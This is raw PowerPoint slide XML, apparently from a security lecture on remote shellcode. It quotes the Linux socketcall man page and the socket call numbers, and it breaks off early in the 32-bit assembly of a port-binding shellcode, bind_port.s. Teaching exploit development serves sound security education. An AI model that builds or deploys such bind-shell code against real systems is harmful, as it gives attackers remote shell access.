                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() is a common kernel entry point for the socket system calls. call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       determines which socket function to invoke. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> points to a block containing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       the actual arguments, which are passed through to the appropriate call.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       User programs should call  the  appropriate  functions  by  their  usual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       names.   Only  standard  library </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>implementors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and kernel hackers need to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       know about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>().</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69745011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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>call numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1551220"/>
            <a:ext cx="7704856" cy="3413755"/>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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5.4.1.2. From /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/include/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_SOCKET  1   /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)    */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_BIND  2   /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)      */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_CONNECT 3   /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)   */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_LISTEN  4   /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)    */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_ACCEPT  5   /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)    */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_GETSOCKNAME 6   /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_getsockname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)   */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_GETPEERNAME 7   /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_getpeername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)   */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_SOCKETPAIR  8   /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_socketpair</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)    */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_SEND  9   /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)      */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_RECV  10    /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)      */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_SENDTO  11    /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_sendto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)    */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_RECVFROM  12    /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_recvfrom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)    */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_SHUTDOWN  13    /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)    */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_SETSOCKOPT  14    /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_setsockopt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)    */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_GETSOCKOPT  15    /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_getsockopt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)    */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_SENDMSG 16    /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_sendmsg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)   */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SYS_RECVMSG 17    /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys_recvmsg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)   */</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1406122999"/>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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bind_port.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (part 1/2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1678394"/>
            <a:ext cx="7704856" cy="4706417"/>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000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BITS 32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; s = socket(2, 1, 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push BYTE 0x66    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #102 (0x66).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cdq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>               ; Zero out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> for use as a null DWORD later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is the type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ; 1 = SYS_SOCKET = socket()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
